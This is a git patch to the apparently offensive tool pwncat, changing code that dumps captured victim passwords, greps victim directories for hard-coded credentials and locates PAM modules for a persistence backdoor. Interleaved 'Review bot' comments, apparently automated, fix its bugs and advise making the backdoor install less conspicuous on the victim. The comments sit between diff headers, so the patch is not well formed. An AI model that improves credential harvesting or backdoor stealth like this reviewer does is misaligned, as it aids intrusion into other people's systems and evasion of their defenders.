From 528088be77cc4e179ddee22a3ed6b4c120ecdb6f Mon Sep 17 00:00:00 2001
From: Caleb Stewart
Date: Thu, 4 Jun 2020 03:34:21 -0400
Subject: [PATCH] Fixed password config and enumeration
---
 pwncat/commands/set.py | 8 ++++----
 pwncat/enumerate/passwords.py | 4 ++--
 pwncat/persist/pam.py | 4 +++-
 3 files changed, 9 insertions(+), 7 deletions(-)
diff --git a/pwncat/commands/set.py b/pwncat/commands/set.py
index d21760a..c49dbd6 100644
--- a/pwncat/commands/set.py
+++ b/pwncat/commands/set.py
@@ -36,10 +36,10 @@ class Command(CommandDefinition):
 if args.password:
 if args.variable is None:
 found = False
- for user, props in pwncat.victim.users.items():
- if "password" in props and props["password"] is not None:
+ for name, user in pwncat.victim.users.items():
+ if user.password is not None:
 print(
- f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(props['password'])}{Fore.RESET}"
+ f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(user.password)}{Fore.RESET}"
 )
 found = True
 if not found:
@@ -50,7 +50,7 @@ class Command(CommandDefinition):
 print(
 f" - {Fore.GREEN}{args.variable}{Fore.RESET} -> {Fore.RED}{repr(args.value)}{Fore.RESET}"
 )
- pwncat.victim.users[args.variable]["password"] = args.value
+ pwncat.victim.users[args.variable].password = args.value
 else:
 if (
 args.variable is not None
diff --git a/pwncat/enumerate/passwords.py b/pwncat/enumerate/passwords.py
index bea3d99..21be878 100644
--- a/pwncat/enumerate/passwords.py
+++ b/pwncat/enumerate/passwords.py
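Review bot: The added print line in the first hunk still interpolates `{user}`, but the rewritten loop header directly above it now binds the dict key to `name` and the value to `user`, so the green label formats the user object rather than the account name (what actually appears depends on that class's `__str__`, which is not visible here). The label should use the key: `f" - {Fore.GREEN}{name}{Fore.RESET} -> {Fore.RED}{repr(user.password)}{Fore.RESET}"`. Because this branch dumps every cached victim credential in the clear, a short comment such as `# Prints all known victim passwords in plaintext; beware terminal logs/recordings` would be worth adding for operators. The enclosing method begins before and ends after this hunk.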
@@ -52,13 +52,13 @@ def enumerate() -> Generator[FactData, None, None]:
 locations = ["/var/www", "$HOME", "/opt", "/etc"]
 # The types of files which are "code". This means that we only recognize the
 # actual password if it is a literal value (enclosed in single or double quotes)
- code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini"]
+ code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini", ".json"]
 grep = pwncat.victim.which("grep")
 if grep is None:
 return
- command = f"{grep} -InRiE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
+ command = f"{grep} -InriE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
 with pwncat.victim.subprocess(command, "r") as filp:
 for line in filp:
 line = line.decode("utf-8").strip().split(":")
diff --git a/pwncat/persist/pam.py b/pwncat/persist/pam.py
index 2b89578..835b57f 100644
--- a/pwncat/persist/pam.py
+++ b/pwncat/persist/pam.py
@@ -114,7 +114,9 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
 pam_modules = "/usr/lib/security"
 try:
 results = (
- pwncat.victim.env(["find", "/", "-name", "pam_deny.so"])
+ pwncat.victim.run(
+ "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
+ )
 .strip()
 .decode("utf-8")
 )
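Review bot: The per-line parse at the end of the hunk, `line.decode("utf-8").strip().split(":")`, splits on every colon, yet the grep pattern on the changed command line deliberately matches `password:`, so the matched text itself is chopped into extra fields on such hits (and on any path containing a colon); unless the code after the hunk re-joins them, `split(":", 2)` would keep path, line number and the full match as exactly three fields. `decode("utf-8")` will also raise UnicodeDecodeError on a non-UTF-8 source file and abort the whole enumeration pass — `-I` skips binaries but not latin-1 text — so `decode("utf-8", errors="replace")` is the safer choice for a best-effort scan. The `-R` to `-r` switch stops grep following symlinked directories below the listed roots, which looks like a deliberate loop/escape guard; a comment such as `# -r (not -R): don't follow symlinks under the roots, avoids loops and walking outside them` would record the intent. The body of enumerate() continues beyond this hunk.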
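Review bot: The new `find / -name pam_deny.so` walks the entire victim filesystem, including /proc, /sys and any network mounts, which is slow and conspicuous for a persistence install; PAM modules live under a handful of library roots, so restricting the search and stopping at the first hit avoids most of that, e.g. `"find /lib /lib64 /usr/lib /usr/lib64 -xdev -name pam_deny.so -print -quit 2>/dev/null"` (`-quit` is GNU find only, so a busybox fallback may be needed). If `find` does report several paths (32- and 64-bit multilib trees, for instance), whatever consumes `results` after this hunk has to pick one deterministically, which the single-result form also sidesteps. The `| grep -v 'snap/'` filter only drops snap mounts; `-xdev` or an explicit `-path /snap -prune` is the usual way to keep such pseudo-filesystems out without a second process. The `try` block's handler lies outside the hunk.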